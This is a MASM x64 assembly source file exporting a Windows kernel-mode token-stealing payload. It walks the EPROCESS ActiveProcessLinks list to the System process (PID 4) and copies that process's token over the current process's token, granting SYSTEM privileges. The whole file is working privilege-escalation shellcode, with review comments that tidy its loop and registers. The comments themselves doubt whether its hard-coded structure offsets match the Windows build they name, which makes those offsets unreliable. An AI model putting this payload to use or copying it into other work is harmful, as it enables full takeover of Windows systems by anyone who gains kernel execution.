
; MASM (ml64) source, x64, Intel syntax, built for the Windows x64 ABI.
; Exports a single kernel-mode token-stealing payload, `shellcode`.
PUBLIC  shellcode

_TEXT	SEGMENT
; NOTE(review): the g_* globals below are declared but never referenced by
; `shellcode` -- the procedure hard-codes every structure offset itself.
; Anyone expecting these to parameterize the payload for other kernel
; builds should check the PROC body first.
EXTRN	g_kthread:QWORD
extrn	g_EPROCESS:QWORD
extrn	g_EPROCESS_TokenOffset:QWORD
extrn	g_flink:QWORD
extrn	g_PID:QWORD
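;-----------------------------------------------------------------------
; NTSTATUS shellcode(void)
; Kernel-mode token-stealing payload (MASM, x64, Microsoft x64 ABI).
; Walks nt!_EPROCESS.ActiveProcessLinks starting from the current
; process until it reaches the process whose UniqueProcessId is 4
; (System), then copies that process's _EPROCESS.Token over the current
; process's _EPROCESS.Token.
; In:    none (must execute at kernel privilege; reads gs:[KPCR])
; Out:   rax = 0 (STATUS_SUCCESS) after the token has been copied;
;        rax = STATUS_UNSUCCESSFUL if the walk wraps back to the starting
;        process without meeting PID 4 (the original spun forever here).
; Clobb: rcx, rdx, r8, flags.  rdi is callee-saved under the Windows
;        x64 ABI; the original used it as the link offset and returned
;        with it clobbered, so a caller that relied on rdi could fault.
;        This version uses the volatile r8 instead and leaves rdi alone.
; Stack: none.
;
; NOTE(review): every offset below is tied to one specific kernel build.
; The original comments labelled them Win 7 SP1, but 0xE0/0xE8/0x168 for
; UniqueProcessId/ActiveProcessLinks/Token (and 0x68 for
; KTHREAD.ApcState.Process) are not the values usually cited for
; Win 7 SP1 x64 -- confirm against the target with `dt nt!_EPROCESS`
; and `dt nt!_KTHREAD` before relying on this payload.
;-----------------------------------------------------------------------
shellcode PROC
KPCR_CURRENT_THREAD      EQU 392          ; 0x188 nt!_KPCR.Prcb.CurrentThread
KTHREAD_APCSTATE_PROCESS EQU 104          ; 0x068 nt!_KTHREAD.ApcState.Process
EPROCESS_UNIQUE_PID      EQU 224          ; 0x0E0 nt!_EPROCESS.UniqueProcessId
EPROCESS_ACTIVE_LINKS    EQU 232          ; 0x0E8 nt!_EPROCESS.ActiveProcessLinks
EPROCESS_TOKEN           EQU 360          ; 0x168 nt!_EPROCESS.Token (EX_FAST_REF)
SYSTEM_PID               EQU 4            ; PID of the System process
STATUS_UNSUCCESSFUL      EQU 0C0000001h

        ; rax = current _KTHREAD, then the _EPROCESS it belongs to
        mov     rax, gs:[KPCR_CURRENT_THREAD]
        mov     rax, [rax + KTHREAD_APCSTATE_PROCESS]
        mov     rcx, rax                        ; rcx = current _EPROCESS: list start and token destination
        mov     rdx, SYSTEM_PID                 ; rdx = PID being searched for
        mov     r8, EPROCESS_ACTIVE_LINKS       ; r8 = link offset (volatile register, unlike rdi)

NextProcess:
        ; rax = CONTAINING_RECORD(rax->ActiveProcessLinks.Flink, _EPROCESS, ActiveProcessLinks)
        mov     rax, [rax + r8]
        sub     rax, r8
        cmp     [rax + EPROCESS_UNIQUE_PID], rdx
        je      FoundSystem
        cmp     rax, rcx                        ; back at the starting process: PID 4 is not on the list
        jne     NextProcess
        mov     eax, STATUS_UNSUCCESSFUL        ; leave the token untouched rather than hang the CPU
        ret

FoundSystem:
        ; Raw EX_FAST_REF copy, low reference-count bits included, exactly as
        ; the original did.  NOTE(review): the System token's reference count
        ; is not incremented for the new owner; confirm that this is
        ; acceptable on the target before relying on the result.
        mov     rdx, [rax + EPROCESS_TOKEN]
        mov     [rcx + EPROCESS_TOKEN], rdx
        xor     eax, eax                        ; STATUS_SUCCESS
        ret
shellcode ENDP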

_TEXT	ENDS

END